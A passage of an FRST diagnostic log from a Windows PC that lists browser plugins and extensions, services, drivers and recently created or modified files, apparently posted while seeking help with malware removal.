FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_16_0_0_235.dll ()
FF Plugin: @mcafee.com/MSC,version=10 -> C:\Program Files\mcafee\msc\npMcSnFFPl64.dll No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_235.dll ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=3.5.29 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @mcafee.com/MSC,version=10 -> C:\Program Files (x86)\McAfee\msc\npMcSnFFPl.dll No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3505.0912 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin HKU\S-1-5-21-3865632982-2122395147-3624827403-1002: @octoshape.com/Octoshape Streaming Services,version=1.0 -> C:\Users\JWT\AppData\Roaming\Octoshape\Octoshape Streaming Services\sua-1312180-0-npoctoshape.dll (Octoshape ApS)
FF Plugin HKU\S-1-5-21-3865632982-2122395147-3624827403-1002: @tools.google.com/Google Update;version=3 -> C:\Users\JWT\AppData\Local\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKU\S-1-5-21-3865632982-2122395147-3624827403-1002: @tools.google.com/Google Update;version=9 -> C:\Users\JWT\AppData\Local\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\JWT\AppData\Roaming\mozilla\plugins\npoctoshape.dll (Octoshape ApS)
FF Extension: Hola Better Internet - C:\Users\JWT\AppData\Roaming\Mozilla\Firefox\Profiles\u3ip9ptp.default\Extensions\jid1-4P0kohSJxU1qGg@jetpack [2014-12-17]
FF Extension: FireShot - C:\Users\JWT\AppData\Roaming\Mozilla\Firefox\Profiles\u3ip9ptp.default\Extensions\{0b457cAA-602d-484a-8fe7-c1d894a011ba} [2014-12-29]
FF Extension: Easy Screenshot - C:\Users\JWT\AppData\Roaming\Mozilla\Firefox\Profiles\u3ip9ptp.default\Extensions\easyscreenshot@mozillaonline.com.xpi [2014-06-05]
FF Extension: YouTube Video and Audio Downloader - C:\Users\JWT\AppData\Roaming\Mozilla\Firefox\Profiles\u3ip9ptp.default\Extensions\feca4b87-3be4-43da-a1b1-137c24220968@jetpack.xpi [2014-08-16]
FF Extension: Awesome screenshot: Capture and Annotate - C:\Users\JWT\AppData\Roaming\Mozilla\Firefox\Profiles\u3ip9ptp.default\Extensions\jid0-GXjLLfbCoAx0LcltEdFrEkQdQPI@jetpack.xpi [2014-06-05]
FF Extension: Download Status Bar - C:\Users\JWT\AppData\Roaming\Mozilla\Firefox\Profiles\u3ip9ptp.default\Extensions\{6c28e999-e900-4635-a39d-b1ec90ba0c0f}.xpi [2014-03-04]
FF Extension: Adblock Plus - C:\Users\JWT\AppData\Roaming\Mozilla\Firefox\Profiles\u3ip9ptp.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2014-03-04]
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR DefaultSuggestURL: Default -> {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:inputType}{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}{google:searchVersion}{google:sessionToken}{google:prefetchQuery}sugkey={google:suggestAPIKeyParameter}
CHR Profile: C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Translate) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapbdbdomjkkjkaonfhkkikfgjllcleb [2014-01-31]
CHR Extension: (Magic Actions for YouTube™) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\abjcfabbhafbcdfjoecdgepllmpfceif [2014-01-31]
CHR Extension: (Awesome Screenshot: Capture & Annotate) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\alelhddbbhepgpmgidjdcjakblofbmce [2014-05-10]
CHR Extension: (Google Docs) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-01-31]
CHR Extension: (Google Drive) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-01-31]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-22]
CHR Extension: (Turn Off the Lights) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\bfbmjmiodbnnpllbbbfblcplfjjepjdn [2014-01-31]
CHR Extension: (WOT) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\bhmmomiinigofkjcapegjjndpbikblnp [2014-01-31]
CHR Extension: (YouTube) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-01-31]
CHR Extension: (Google Cast) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\boadgeojelhgndaghljhdicfkmllpafd [2014-12-05]
CHR Extension: (Videostream for Google Chromecast™) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnciopoikihiagdjbjpnocolokfelagl [2014-12-21]
CHR Extension: (Google Search) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-01-31]
CHR Extension: (Google Calendar) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejjicmeblgpmajnghnpcppodonldlgfn [2014-01-31]
CHR Extension: (HTTPS Everywhere) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\gcbommkclmclpchllfjekcdonpmejbdp [2014-01-31]
CHR Extension: (Mail Checker Plus for Google Mail™) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\gffjhibehnempbkeheiccaincokdjbfe [2014-01-31]
CHR Extension: (AdBlock) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2014-01-31]
CHR Extension: (Pixlr Editor) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\icmaknaampgiegkcjlimdiidlhopknpk [2014-05-26]
CHR Extension: (Google Play Music) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\icppfcnhkcmnfdhfhphakoifcfokfdhg [2014-01-31]
CHR Extension: (Disconnect) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\jeoacafpbcihiomhlakheieifhpjdfeo [2014-01-31]
CHR Extension: (Downloads) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\jfchnphgogjhineanplmfkofljiagjfb [2014-01-31]
CHR Extension: (Pixlr Touch Up) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\jklljiahjgoglchglekebfljnmbaleig [2014-05-26]
CHR Extension: (Speed Dial 2) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpfpebmajhhopeonhlcgidhclcccjcik [2014-02-24]
CHR Extension: (Google Voice (by Google)) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\kcnhkahnjcbndmmehfkdnkjomaanaooo [2014-01-31]
CHR Extension: (Download Master) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcceagdollnkjlogmdckgjakjapmkdjf [2014-01-31]
CHR Extension: (Google Mail Checker) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\mihcahmgecmbnbcchbopgniflfhgnkff [2014-01-31]
CHR Extension: (AutoPager Chrome) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\mmgagnmbebdebebbcleklifnobamjonh [2014-01-31]
CHR Extension: (Google Wallet) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-01-31]
CHR Extension: (Docs PDF/PowerPoint Viewer (by Google)) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\nnbmlagghjjcbdhgmkedmbmedengocbn [2014-01-31]
CHR Extension: (Click&Clean App) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\pdabfienifkbhoihedcgeogidfmibmhp [2014-01-31]
CHR Extension: (Send from Gmail (by Google)) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\pgphcomnlaojlmmcjmiddhdapjpbgeoc [2014-01-31]
CHR Extension: (Evernote Web Clipper) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\pioclpoplcdbaefihamjohnefbikjilc [2014-01-31]
CHR Extension: (Gmail) - C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-01-31]
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 !SASCORE; C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE [172344 2014-08-21] (SUPERAntiSpyware.com)
R2 ASUS InstantOn; C:\Program Files\ASUS\P4G\InsOnSrv.exe [277120 2013-07-23] (ASUS)
R2 Asus WebStorage Windows Service; C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.18.159\AsusWSWinService.exe [72192 2012-12-19] () [File not signed]
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [319104 2014-01-24] (Windows ® Win 7 DDK provider)
S2 CLKMSVC10_38F51D56; C:\Program Files (x86)\CyberLink\PowerDVD10\NavFilter\kmsvc.exe [247768 2013-04-24] (CyberLink)
R2 ETDService; C:\Program Files\Elantech\ETDService.exe [99664 2013-04-10] (ELAN Microelectronics Corp.)
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1148560 2014-12-12] (NVIDIA Corporation)
R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [733696 2013-05-11] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [822232 2013-05-11] (Intel® Corporation)
R2 Intel® ME Service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe [131544 2013-06-23] (Intel Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [169432 2013-06-23] (Intel Corporation)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1701520 2014-12-12] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [19823248 2014-12-12] (NVIDIA Corporation)
R2 PaceLicenseDServices; C:\Program Files (x86)\Common Files\PACE\Services\LicenseServices\LDSvc.exe [2938880 2012-05-18] (PACE Anti-Piracy, Inc.) [File not signed]
R2 Qualcomm Atheros Killer Service V2; C:\Program Files\Qualcomm Atheros\Network Manager\KillerService.exe [342016 2013-09-04] (Qualcomm Atheros) [File not signed]
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [368632 2014-09-21] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2014-09-21] (Microsoft Corporation)
R2 ZAtheros Bt and Wlan Coex Agent; C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe [323584 2014-01-24] (Atheros) [File not signed]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 akw8x64; C:\Windows\system32\DRIVERS\akw8x64.sys [3812048 2013-05-30] (Qualcomm Atheros, Inc.)
S1 BfLwf; C:\Windows\system32\DRIVERS\bwcW8x64.sys [75056 2013-02-13] (Qualcomm Atheros, Inc.)
R3 BTATH_LWFLT; C:\Windows\system32\DRIVERS\btath_lwflt.sys [77464 2014-01-24] (Qualcomm Atheros)
R3 BthLEEnum; C:\Windows\System32\drivers\BthLEEnum.sys [226304 2013-12-04] (Microsoft Corporation)
S3 cleanhlp; C:\EEK\bin\cleanhlp64.sys [57024 2014-08-20] (Emsisoft GmbH)
S3 DGUSBAP; C:\Windows\system32\DRIVERS\dgmbx2.sys [194864 2011-02-13] (Avid Technology, Inc.)
S3 GeneStor; C:\Windows\System32\drivers\GeneStor.sys [91368 2013-03-21] (GenesysLogic)
S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [197264 2012-05-28] (McAfee, Inc.)
R3 kbfiltr; C:\Windows\System32\drivers\kbfiltr.sys [14992 2012-08-01] ( )
S3 MBX2DFU; C:\Windows\SYSTEM32\DRIVERS\dgmbx2fu.sys [32944 2011-02-13] (Avid Technology, Inc.)
S3 mfencbdc; C:\Windows\system32\DRIVERS\mfencbdc.sys [328976 2012-11-02] (McAfee, Inc.)
S3 mfencrk; C:\Windows\system32\DRIVERS\mfencrk.sys [97208 2012-11-02] (McAfee, Inc.)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [19600 2014-12-12] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [38032 2014-11-22] (NVIDIA Corporation)
R2 plctrl; C:\Program Files\ASUS\P4G\plctrl.sys [14136 2013-07-23] (Windows ® Win 7 DDK provider)
R1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [14928 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
R1 SASKUTIL; C:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS [12368 2011-07-12] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
R3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2014-09-21] (Microsoft Corporation)
U3 swmidi; No ImagePath
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-12-30 07:21 - 2014-12-30 07:21 - 00028476 _____ () C:\Users\JWT\Desktop\FRST.txt
2014-12-30 07:20 - 2014-12-30 07:21 - 00000000 ____D () C:\FRST
2014-12-30 07:20 - 2014-12-30 07:17 - 02123264 _____ (Farbar) C:\Users\JWT\Desktop\FRST64.exe
2014-12-30 01:08 - 2014-12-30 01:08 - 00000000 _____ () C:\WINDOWS\setuperr.log
2014-12-30 01:08 - 2014-12-30 01:08 - 00000000 _____ () C:\WINDOWS\setupact.log
2014-12-30 00:45 - 2014-12-30 01:07 - 00129752 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2014-12-30 00:45 - 2014-12-30 00:45 - 00001080 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-12-30 00:45 - 2014-12-30 00:45 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-12-30 00:45 - 2014-12-30 00:45 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-12-30 00:45 - 2014-11-21 06:14 - 00093400 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2014-12-30 00:45 - 2014-11-21 06:14 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2014-12-30 00:45 - 2014-11-21 06:14 - 00025816 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbam.sys
2014-12-29 21:07 - 2014-12-30 01:06 - 00001860 _____ () C:\WINDOWS\PFRO.log
2014-12-29 20:31 - 2014-12-29 20:31 - 00000000 _____ () C:\Users\JWT\Downloads\rkill64.exe
2014-12-29 20:07 - 2014-12-29 20:07 - 00017466 _____ () C:\Users\JWT\Documents\bc.txt
2014-12-28 19:18 - 2014-12-28 19:18 - 00448512 _____ (OldTimer Tools) C:\Users\JWT\Downloads\TFC.exe
2014-12-28 19:03 - 2014-12-28 19:03 - 02173952 _____ () C:\Users\JWT\Downloads\AdwCleaner.exe
2014-12-23 13:57 - 2014-12-23 13:57 - 01940728 _____ (Bleeping Computer, LLC) C:\Users\JWT\Desktop\rkill.exe
2014-12-21 20:53 - 2014-12-21 20:53 - 00196096 _____ () C:\Users\JWT\Downloads\VideostreamNetworkRepair.exe
2014-12-17 20:33 - 2014-12-17 20:33 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-12-16 22:23 - 2014-11-22 04:46 - 00038032 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvad64v.sys
2014-12-16 22:23 - 2014-11-22 04:46 - 00032400 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvaudcap32v.dll
2014-12-16 12:51 - 2014-12-16 12:51 - 00000000 __SHD () C:\Users\JWT\AppData\Local\EmieBrowserModeList
2014-12-14 09:25 - 2014-12-14 09:25 - 00076776 _____ () C:\Users\JWT\Downloads\FLVPlayer-Chrome.exe
2014-12-10 22:45 - 2014-11-03 14:25 - 00615568 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvStreaming.exe
2014-12-10 12:15 - 2014-11-21 21:13 - 25059840 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2014-12-10 12:15 - 2014-11-21 20:50 - 00580096 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2014-12-10 12:15 - 2014-11-21 20:49 - 02885120 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2014-12-10 12:15 - 2014-11-21 20:49 - 00417280 _____ (Microsoft Corporation) C:\WINDOWS\system32\html.iec
2014-12-10 12:15 - 2014-11-21 20:48 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2014-12-10 12:15 - 2014-11-21 20:35 - 00812544 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2014-12-10 12:15 - 2014-11-21 20:34 - 06039552 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2014-12-10 12:15 - 2014-11-21 20:22 - 19749376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2014-12-10 12:15 - 2014-11-21 20:08 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2014-12-10 12:15 - 2014-11-21 20:07 - 00501248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2014-12-10 12:15 - 2014-11-21 20:06 - 00340992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\html.iec
2014-12-10 12:15 - 2014-11-21 20:06 - 00145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2014-12-10 12:15 - 2014-11-21 20:05 - 00316928 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2014-12-10 12:15 - 2014-11-21 20:05 - 00064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MshtmlDac.dll
2014-12-10 12:15 - 2014-11-21 20:01 - 02277888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2014-12-10 12:15 - 2014-11-21 19:59 - 01032704 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
2014-12-10 12:15 - 2014-11-21 19:55 - 00661504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2014-12-10 12:15 - 2014-11-21 19:52 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2014-12-10 12:15 - 2014-11-21 19:49 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2014-12-10 12:15 - 2014-11-21 19:49 - 00718848 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2014-12-10 12:15 - 2014-11-21 19:49 - 00373760 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2014-12-10 12:15 - 2014-11-21 19:46 - 02125312 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2014-12-10 12:15 - 2014-11-21 19:43 - 14412800 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2014-12-10 12:15 - 2014-11-21 19:35 - 00076288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2014-12-10 12:15 - 2014-11-21 19:34 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2014-12-10 12:15 - 2014-11-21 19:33 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2014-12-10 12:15 - 2014-11-21 19:29 - 04299264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2014-12-10 12:15 - 2014-11-21 19:29 - 00880128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
2014-12-10 12:15 - 2014-11-21 19:28 - 02358272 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2014-12-10 12:15 - 2014-11-21 19:25 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2014-12-10 12:15 - 2014-11-21 19:23 - 00688640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2014-12-10 12:15 - 2014-11-21 19:23 - 00326656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2014-12-10 12:15 - 2014-11-21 19:22 - 02052096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2014-12-10 12:15 - 2014-11-21 19:15 - 01548288 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2014-12-10 12:15 - 2014-11-21 19:13 - 12836864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2014-12-10 12:15 - 2014-11-21 19:03 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2014-12-10 12:15 - 2014-11-21 19:00 - 01888256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2014-12-10 12:15 - 2014-11-21 18:56 - 01307136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2014-12-10 12:15 - 2014-11-21 18:54 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2014-12-10 12:15 - 2014-11-06 22:16 - 01762840 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2014-12-10 12:15 - 2014-11-06 21:26 - 01489072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2014-12-10 12:15 - 2014-10-30 16:37 - 00129536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\poqexec.exe
2014-12-10 12:15 - 2014-10-30 16:34 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\system32\poqexec.exe
2014-12-10 12:15 - 2014-10-12 20:43 - 00238912 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2014-12-10 12:15 - 2014-10-12 20:43 - 00153920 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2014-12-10 12:15 - 2014-10-12 20:43 - 00086336 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pdc.sys
2014-12-10 12:15 - 2014-10-12 20:43 - 00039744 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\intelpep.sys
2014-12-06 09:15 - 2014-12-06 09:15 - 00000000 ____D () C:\Users\JWT\Downloads\searchable
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-12-30 07:20 - 2014-01-31 22:40 - 00000000 ____D () C:\Users\JWT\AppData\Local\CrashDumps
2014-12-30 07:20 - 2013-11-14 01:28 - 00863592 _____ () C:\WINDOWS\system32\PerfStringBackup.INI
2014-12-30 07:18 - 2014-08-14 09:51 - 00000000 ____D () C:\Users\JWT\AppData\Local\Adobe
2014-12-30 07:18 - 2014-01-31 20:28 - 00000075 _____ () C:\Users\JWT\AppData\Roaming\sp_data.sys
2014-12-30 07:16 - 2014-01-31 23:55 - 00000000 __RDO () C:\Users\JWT\SkyDrive
2014-12-30 07:16 - 2014-01-31 20:31 - 00000920 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2014-12-30 07:14 - 2013-08-22 09:36 - 00000000 ____D () C:\WINDOWS\system32\sru
2014-12-30 01:12 - 2014-01-31 20:35 - 00003598 _____ () C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-3865632982-2122395147-3624827403-1002
2014-12-30 01:08 - 2014-08-31 19:36 - 01093825 _____ () C:\WINDOWS\WindowsUpdate.log
2014-12-30 01:07 - 2014-03-03 17:44 - 00000000 ____D () C:\ProgramData\NVIDIA
2014-12-30 01:07 - 2013-08-22 08:45 - 00000006 ____H () C:\WINDOWS\Tasks\SA.DAT
2014-12-30 01:06 - 2014-01-31 20:31 - 00000924 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2014-12-30 01:01 - 2014-11-22 16:56 - 00000918 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-3865632982-2122395147-3624827403-1002UA.job
2014-12-30 00:51 - 2014-03-04 21:16 - 00000830 _____ () C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2014-12-30 00:50 - 2014-08-21 12:06 - 00005198 _____ () C:\Users\JWT\Desktop\Rkill.txt
2014-12-30 00:45 - 2013-05-01 03:34 - 00000000 ____D () C:\ProgramData\Adobe
2014-12-30 00:45 - 2013-05-01 03:34 - 00000000 ____D () C:\Program Files (x86)\Adobe
2014-12-29 23:13 - 2014-03-03 20:20 - 02545664 ___SH () C:\Users\JWT\Desktop\Thumbs.db
2014-12-29 22:16 - 2013-08-22 09:36 - 00000000 ____D () C:\WINDOWS\AppReadiness
2014-12-29 21:11 - 2014-02-01 00:08 - 00000000 ____D () C:\Program Files\SUPERAntiSpyware
2014-12-29 20:48 - 2014-02-01 20:43 - 00000836 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2014-12-29 20:48 - 2014-02-01 20:43 - 00000000 ____D () C:\Program Files\CCleaner
2014-12-29 20:40 - 2014-10-01 09:16 - 00000105 _____ () C:\WINDOWS\SysWOW64\get.dat
2014-12-29 20:35 - 2014-02-01 20:23 - 00000000 ____D () C:\Users\JWT\AppData\Roaming\BitTorrent
2014-12-29 20:19 - 2014-08-21 10:39 - 00145973 _____ () C:\WINDOWS\SysWOW64\tubekey.dat
